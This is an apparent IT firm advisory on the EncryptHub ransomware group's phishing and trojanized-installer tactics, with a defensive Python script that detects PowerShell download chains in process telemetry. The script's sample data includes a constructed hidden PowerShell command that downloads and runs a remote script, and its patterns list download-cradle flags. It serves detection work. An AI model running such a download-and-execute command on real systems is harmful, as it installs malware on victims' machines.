
March 6, 2025
Cybersecurity / Ransomware
Impress IT Solutions, a leading cybersecurity provider in West Houston, is alerting local businesses about the growing threat posed by cybercriminal groups deploying ransomware and information-stealing malware through phishing campaigns and trojanized applications. One such threat actor, known as EncryptHub, has been actively refining its attack methods, posing a serious risk to organizations in various industries.
According to recent reports, EncryptHub has been distributing trojanized versions of popular applications and leveraging third-party Pay-Per-Install (PPI) services to maximize the reach of its malware. These tactics allow the attackers to infiltrate systems, steal sensitive data, and deploy ransomware that can cripple business operations.
How EncryptHub Targets Businesses
EncryptHub, also tracked as LARVA-208 by cybersecurity analysts, has been active since mid-2024. The group employs a variety of sophisticated tactics to compromise businesses, including:
- Phishing Attacks: Using SMS phishing (smishing) and voice phishing (vishing), attackers impersonate IT support personnel to trick employees into installing remote monitoring and management (RMM) software.
- Fake VPN Login Pages: Victims are directed to phishing sites that mimic legitimate company VPN portals, stealing credentials that grant attackers direct access to business networks.
- Social Engineering: Attackers call employees, posing as IT support, and convince them to enter login details on fraudulent sites under the guise of resolving technical issues.
- Malicious Software Installations: EncryptHub has been distributing trojanized versions of popular software such as Microsoft Teams, Google Meet, Visual Studio, and Palo Alto GlobalProtect to gain initial access.
Once inside a system, EncryptHub deploys PowerShell scripts to install stealer malware, such as Fickle, StealC, and Rhadamanthys, which exfiltrate sensitive business data. Ultimately, the attack culminates in ransomware deployment, encrypting critical business files and demanding a ransom payment.
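As an added illustration of how a defender might spot the PowerShell-to-stealer step described above, the script below correlates Windows process-creation events: it flags a PowerShell process that was launched by an installer or that carries download-cradle or hiding flags, and raises an alert only when that same process then runs a binary dropped in a user-writable folder. This is example code written for this article, not EncryptHub tooling or any vendor's product; every event, host name, file path and the 203.0.113.10 address is constructed for the demonstration.

```python
"""Correlate process-creation events to detect an installer-launched or
obfuscated PowerShell that pulls a payload and then runs a dropped binary.

All events below are constructed for this example. Field names follow the
shape of Sysmon Event ID 1 (ProcessCreate); the values are invented.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Download cradles and flags commonly used to hide a PowerShell stage.
CRADLE_PATTERNS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression|"
    r"-EncodedCommand|-enc\b|-w(indowstyle)?\s+hidden|-ExecutionPolicy\s+Bypass|-ep\s+bypass",
    re.IGNORECASE,
)
# Locations a phished user can write to without admin rights.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData)\\", re.IGNORECASE)
# Parents that should not normally be launching PowerShell: a trojanized
# installer or collaboration app the victim was tricked into running.
SUSPECT_PARENTS = re.compile(r"(msiexec\.exe|setup|install|teams|meet|globalprotect)", re.IGNORECASE)


@dataclass
class Event:
    ts: datetime
    host: str
    pid: int
    ppid: int
    image: str
    parent_image: str
    cmdline: str


def is_suspicious_powershell(ev):
    """Return a list of reasons if the event is a suspicious PowerShell launch, else None."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    reasons = []
    if CRADLE_PATTERNS.search(ev.cmdline):
        reasons.append("download cradle / obfuscation flags in command line")
    if SUSPECT_PARENTS.search(ev.parent_image):
        reasons.append(f"launched by {ev.parent_image}")
    return reasons or None


def detect_chain(events, window=timedelta(minutes=5)):
    """Alert when a suspicious PowerShell spawns a child from a user-writable
    path within `window`. A cradle alone is noisy; the dropped-binary child
    is what separates an installer chain from routine scripted downloads."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        by_host[ev.host].append(ev)
    alerts = []
    for host, evs in by_host.items():
        for ps in evs:
            reasons = is_suspicious_powershell(ps)
            if not reasons:
                continue
            for child in evs:
                if (child.ppid == ps.pid and ps.ts <= child.ts <= ps.ts + window
                        and USER_WRITABLE.search(child.image)):
                    alerts.append({
                        "host": host,
                        "powershell_pid": ps.pid,
                        "dropped_binary": child.image,
                        "reasons": reasons + [f"spawned {child.image} from user-writable path"],
                    })
    return alerts


# Constructed sample telemetry (invented hosts, PIDs, paths and URL).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
T0 = datetime(2025, 3, 6, 9, 15, 0)
SAMPLE_EVENTS = [
    # Benign: help desk runs a diagnostic from an interactive session.
    Event(T0, "WS-101", 4120, 1200, PS, r"C:\Windows\explorer.exe",
          "powershell.exe -Command Get-Service"),
    # Noisy but benign: a management agent fetches a manifest; nothing dropped is executed.
    Event(T0 + timedelta(seconds=30), "WS-101", 4130, 900, PS, r"C:\Program Files\Vendor\agent.exe",
          "powershell.exe -c Invoke-WebRequest https://updates.example.com/manifest.json"),
    # Malicious chain: a trojanized installer launches a hidden download cradle...
    Event(T0 + timedelta(minutes=2), "WS-202", 5300, 5100, PS, r"C:\Users\jdoe\Downloads\TeamsSetup.exe",
          "powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient)"
          ".DownloadString('http://203.0.113.10/s.ps1')"),
    # ...which then runs a stealer dropped under AppData.
    Event(T0 + timedelta(minutes=2, seconds=40), "WS-202", 5320, 5300,
          r"C:\Users\jdoe\AppData\Roaming\svchost.exe", PS,
          r"C:\Users\jdoe\AppData\Roaming\svchost.exe"),
]

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(alert)
```

Run stand-alone, the script prints one alert for host WS-202 and none for WS-101: the agent's Invoke-WebRequest is flagged as suspicious on its own but never produces an alert, because the second condition (a child executable launched from a user-writable path) is what the correlation requires. In production the same logic would be fed from an EDR or Sysmon pipeline rather than an inline list.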
The Growing Threat of PPI Malware Distribution
Since early 2025, EncryptHub has been leveraging a third-party PPI service called LabInstalls, which sells bulk malware installations for as little as $10 per 100 installations. This approach enables cybercriminals to distribute their malware at scale with minimal effort.
“Threat actors are constantly evolving their attack methods to stay ahead of security defenses,” said an Impress IT Solutions cybersecurity expert. “The use of PPI services allows them to quickly spread malware, making it even more crucial for businesses in West Houston to stay vigilant and implement multi-layered security defenses.”
Protecting West Houston Businesses from Cyber Threats
Impress IT Solutions urges companies in West Houston to adopt a proactive cybersecurity strategy to defend against these threats. Recommended measures include:
- Employee Training: Educate staff on recognizing phishing attempts and social engineering tactics.
- Multi-Factor Authentication (MFA): Require MFA for VPNs, email accounts, and other critical business applications, and prefer phishing-resistant methods such as FIDO2 security keys or passkeys; a one-time code typed into a fake VPN portal can be relayed to the real one in seconds.
- Endpoint Protection: Deploy endpoint detection and response (EDR) solutions to identify and neutralize malware, and block installation of RMM tools the organization has not approved, since this group relies on talking staff into installing one.
- Regular Security Audits: Conduct frequent assessments of security systems and policies.
- Backup and Recovery: Maintain offline or immutable offsite backups that an attacker with domain credentials cannot delete or encrypt, and test restores regularly so systems can be recovered quickly after a ransomware attack.
As cybercriminals continue to refine their techniques, businesses must remain vigilant. Impress IT Solutions is committed to helping West Houston companies strengthen their cybersecurity defenses against ransomware and data breaches.
For more information on how to protect your business, contact Impress IT Solutions today.